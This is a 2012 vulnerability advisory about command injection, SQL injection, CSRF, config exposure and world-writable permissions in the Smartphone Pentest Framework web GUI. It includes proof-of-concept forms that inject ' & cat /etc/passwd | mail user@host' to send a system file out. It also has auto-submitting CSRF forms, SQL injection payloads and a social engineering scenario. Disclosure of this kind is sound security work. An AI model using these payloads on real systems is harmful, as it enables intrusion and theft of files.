Multiple Vulnerabilities in Smartphone Pentest Framework (SPF)
| Advisory ID: | HTB23123 |
| Product: | Smartphone Pentest Framework (SPF) |
| Vendor: | Bulb Security LLC |
| Vulnerable Versions: | 0.1.2 and probably prior |
| Tested Version: | 0.1.2 |
| Advisory Publication: | October 24, 2012 [without technical details] |
| Vendor Notification: | October 24, 2012 |
| Vendor Fix: | November 15, 2012 |
| Public Disclosure: | November 14, 2012 |
| Latest Update: | November 15, 2012 |
| Vulnerability Type: | OS Command Injection [CWE-78]
SQL Injection [CWE-89]
Cross-Site Request Forgery [CWE-352]
Information Exposure [CWE-200]
Incorrect Default Permissions [CWE-276] |
| CVE References: | CVE-2012-5693
CVE-2012-5694
CVE-2012-5695
CVE-2012-5696
CVE-2012-5697 |
| Risk Level: | High |
|  |
| CVSSv2 Base Scores: | 8.3 (AV:A/AC:L/Au:N/C:C/I:C/A:C)
5.8 (AV:A/AC:L/Au:N/C:P/I:P/A:P)
5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)
3.3 (AV:A/AC:L/Au:N/C:P/I:N/A:N)
4.6 (AV:L/AC:L/Au:N/C:P/I:P/A:P) |
| Solution Status: | Fixed by Vendor |
| Discovered and Provided: | High-Tech Bridge Security Research Lab |
|
Advisory Details: |
High-Tech Bridge Security Research Lab discovered multiple vulnerabilities in Smartphone Pentest Framework (SPF) web-based GUI, which could be exploited to get control over a pentester's machine. The research was inspired by the vulnerability found by Jon Passki
(http://osvdb.org/85873).
Even if the web server hosting SPF GUI is not accessible from the Internet (which is a case for many pentesters) the vulnerabilities can still be easily exploited via the local/internal network, or even from remote via CSRF vector. In default installation of SPF the web server port and GUI application's path are easily predictable (localhost:80/frameworkgui/).
1) Multiple OS Command Execution Vulnerabilities in Smartphone Pentest Framework (SPF): CVE-2012-5693
Multiple Perl scripts in the "/frameworkgui/" directory do not perform sanitation of user-supplied input passed as argument to the system() function. This could be exploited to inject and execute arbitrary OS commands on the target system with privileges of the web server.
Vulnerable scripts and parameters:
- remoteAttack.pl:
"ipAddressTB" HTTP POST parameter.
- CSAttack.pl:
"hostingPath", "filename" and "phNo2Attack" HTTP POST parameters.
- SEAttack.pl:
"hostingPath", "platformDD2", "fileName" and "phNo2Attack" HTTP POST parameters.
- attach2agents.pl:
"agentURLPath" and "agentControlKey" HTTP POST parameters.
- attachMobileModem.pl:
"appURLPath" and "controlKey" HTTP POST parameters.
- guessPassword.pl:
"ipAddressTB" HTTP POST parameter.
PoCs (Proof-of-Concept) below will send "/etc/passwd" file to the "user@host" email address:
<form action="http://[host]/remoteAttack.pl" method="post">
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/CSAttack.pl" method="post">
<input type="hidden" name="hostingPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/SEAttack.pl" method="post">
<input type="hidden" name="hostingPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/attach2agents.pl" method="post">
<input type="hidden" name="agentURLPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/attachMobileModem.pl" method="post">
<input type="hidden" name="appURLPath" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<form action="http://[host]/frameworkgui/guessPassword.pl" method="post">
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
All of the above-mentioned vulnerabilities can be exploited via CSRF vector. The PoC below sends "/etc/passwd" file to the "user@host" email address as soon as victim [that has open SPF GUI in one tab of a browser] visits a malicious web page with CSRF exploit:
<form action="http://localhost/frameworkgui/guessPassword.pl" method="post" name=f1>
<input type="hidden" name="ipAddressTB" value=' & cat /etc/passwd | mail user@host' />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit()
</script>
2) Multiple SQL Injections in Smartphone Pentest Framework (SPF): CVE-2012-5694
Multiple Perl scripts in the "/frameworkgui/" directory are vulnerable to SQL injections. A remote attacker can execute arbitrary SQL commands in application's database.
Vulnerable scripts and parameters:
- attach2Agents.pl:
"agentPhNo", "controlPhNo", "agentURLPath", "agentControlKey" and "platformDD1" HTTP POST parameters.
- attachMobileModem.pl:
"modemPhoneNo", "controlKey" and "appURLPath" HTTP POST parameters.
- escalatePrivileges.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
- getContacts.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
- getDatabase.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
- SEAttack.pl:
"modemNoDD" HTTP POST parameter
- sendSMS.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
- takePic.pl:
"agentsDD" and "modemNoDD" HTTP POST parameters.
- CSAttack.pl:
"modemNoDD2" HTTP POST parameter.
The following PoC is available:
<form action="http://[host]/frameworkgui/attach2Agents.pl" method="post">
<input type="hidden" name="agentPhNo" value="-1 UNION SELECT version() INTO OUTFILE '/tmp/file.txt'" />
<input type="submit" id="btn">
</form>
All the above-mentioned SQL injections can also be exploited via CSRF vector:
<form action="http://localhost/cgi-bin/frameworkgui/attach2Agents.pl" method="post" name=f1>
<input type="hidden" name="agentPhNo" value="-1 UNION SELECT version() INTO OUTFILE 'file.txt'" />
<input type="submit" id="btn">
</form>
<script>
document.f1.Submit();
</script>
3) Cross-Site Request Forgery in Smartphone Pentest Framework (SPF): CVE-2012-5695
The vulnerability exists due to insufficient verification of the HTTP requests origin in all Perl scripts within the "/frameworkgui/" directory. A remote attacker without direct access to application's web interface can perform cross-site request forgery attacks and execute arbitrary actions available to application's users only (e.g. send SMS messages).
However, in our case the most practical usage of the CSRF vulnerabilities is to exploit OS command injection and SQL injection vulnerabilities described in sections 1) and 2) of this advisory.
A Social Engineering attack scenario may be quite simple:
Step 1: Send link to your friend to "a brilliant pentester's framework".
Step 2: The majority of people will make a default installation of the SPF.
Step 3: Send link to "SPF practical usage" manual with CSRF exploit to your friend.
Step 4: With a bit of luck you can execute arbitrary commands on your friend's machine.
4) Improper Access Control in Smartphone Pentest Framework (SPF): CVE-2012-5696
The weakness exists due to insufficient ACL to the "config" file located in "/frameworkgui/" directory. A remote attacker can access the configuration file directly and obtain sensitive information, such as database password that is stored in plaintext.
PoC:
http://[host]/frameworkgui/config
5) Incorrect Default Permissions in Smartphone Pentest Framework (SPF): CVE-2012-5697
The weakness exists because of "btinstall" installation script that sets world-writable permissions for all files within the "/frameworkgui/" directory:
cd /var/www/frameworkgui; chmod 777 * ;
A local unprivileged user can read and modify arbitrary files located within this directory.
Further exploitation of this vulnerability might allow an attacker to place or inject into existing Perl scripts a backdoor and even gain full control over the system under certain conditions.
|
- GDPR & PCI DSS Test
- Website CMS Security Test
- CSP & HTTP Headers Check
- WordPress & Drupal Scanning
Try For Free
Solution: |
Vendor reply (October 24, 2012):
"I'm taking the GUI out of the project entirely for the time being so that will be the short term patch. DARPA wanted there to be a gui but obviously having a webbased gui was a terrible idea. Feel free to release whatever you want about it, everybody else does."
Vendor reply (November 8, 2012):
"The product in question doesnt even exist anymore. So I don't know what you want me to say about it being patched. It was just a proof of concept. Not a product at all. And since clearly it wasnt good enough for primetime I removed it from github. Say whatever you want about it."
Vendor solution (November 15, 2012):
According to the vendor all the vulnerabilities are patched in version 0.1.3: https://github.com/georgiaw/Smartphone-Pentest-Framework |
| |
References: |
[1] High-Tech Bridge Advisory HTB23123 - https://www.immuniweb.com/advisory/HTB23123 - Multiple Vulnerabilities in Smartphone Pentest Framework (SPF).
[2] Smartphone Pentest Framework (SPF) - http://www.bulbsecurity.com/smartphone-pentest-framework/ - Smartphone Pentest Framework is an open source security tool, designed to aid in assessing the security posture of smartphones in an environment.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. |
|
Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
